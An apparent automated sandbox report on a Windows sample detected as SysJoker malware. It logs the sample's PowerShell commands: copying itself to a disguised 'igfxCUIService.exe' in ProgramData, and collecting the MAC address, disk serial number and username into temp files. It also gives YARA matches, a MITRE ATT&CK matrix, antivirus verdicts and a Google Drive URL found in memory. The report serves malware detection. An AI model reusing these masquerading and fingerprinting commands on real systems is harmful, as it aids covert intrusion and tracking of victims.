                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe" Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumberJump to behavior
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmpBinary or memory string: .Program ManagerQEIA
                        Source: igfxCUIService.exe, 00000007.00000002.829078812.0000000001430000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: GetLocaleInfoW,0_2_00C098B8
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00C0EAAA
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: EnumSystemLocalesW,0_2_00C09396
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00C0E31E
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00C0EC7F
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: EnumSystemLocalesW,0_2_00C0E5C0
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: EnumSystemLocalesW,0_2_00C0E6A6
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: EnumSystemLocalesW,0_2_00C0E60B
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,7_2_00D49396
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,7_2_00D4E31E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,7_2_00D4E5C0
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,7_2_00D4E6A6
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: EnumSystemLocalesW,7_2_00D4E60B
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00D4E731
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,7_2_00D498B8
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,7_2_00D4E984
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_00D4EAAA
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetLocaleInfoW,7_2_00D4EBB0
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00D4EC7F
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BF5007 cpuid 0_2_00BF5007
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C098F7 GetSystemTimeAsFileTime,0_2_00C098F7

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected SysJokerShow sources
                        Source: Yara matchFile source: qtjRj8L3Rw.exe, type: SAMPLE
                        Source: Yara matchFile source: 7.0.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: qtjRj8L3Rw.exe PID: 5732, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: igfxCUIService.exe PID: 4384, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\SystemData\igfxCUIService.exe, type: DROPPED

                        Remote Access Functionality:

                        barindex
                        Yara detected SysJokerShow sources
                        Source: Yara matchFile source: qtjRj8L3Rw.exe, type: SAMPLE
                        Source: Yara matchFile source: 7.0.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.igfxCUIService.exe.d10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.qtjRj8L3Rw.exe.bd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: qtjRj8L3Rw.exe PID: 5732, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: igfxCUIService.exe PID: 4384, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\SystemData\igfxCUIService.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation2Application Shimming1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion121LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsPowerShell2Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information11NTDSVirtualization/Sandbox Evasion121Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery32Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1708662 Sample: qtjRj8L3Rw Startdate: 12/01/2022 Architecture: WINDOWS Score: 88 35 Antivirus / Scanner detection for submitted sample 2->35 37 Yara detected SysJoker 2->37 39 Found detection on Joe Sandbox Cloud Basic 2->39 8 qtjRj8L3Rw.exe 5 2->8         started        process3 process4 10 igfxCUIService.exe 2 8->10         started        13 powershell.exe 13 8->13         started        file5 45 Antivirus detection for dropped file 10->45 47 Encrypted powershell cmdline option found 10->47 16 powershell.exe 16 10->16         started        18 powershell.exe 1 10->18         started        31 C:\ProgramData\...\igfxCUIService.exe, PE32 13->31 dropped 33 C:\...\igfxCUIService.exe:Zone.Identifier, ASCII 13->33 dropped 49 Powershell drops PE file 13->49 20 conhost.exe 13->20         started        signatures6 process7 process8 22 getmac.exe 1 16->22         started        25 WMIC.exe 1 16->25         started        27 conhost.exe 16->27         started        29 conhost.exe 18->29         started        signatures9 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->41 43 Writes or reads registry keys via WMI 22->43

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        qtjRj8L3Rw.exe100%AviraTR/Redcap.rjsiq

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\SystemData\igfxCUIService.exe100%AviraTR/Redcap.rjsiq

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu2igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmpfalse
                          		high
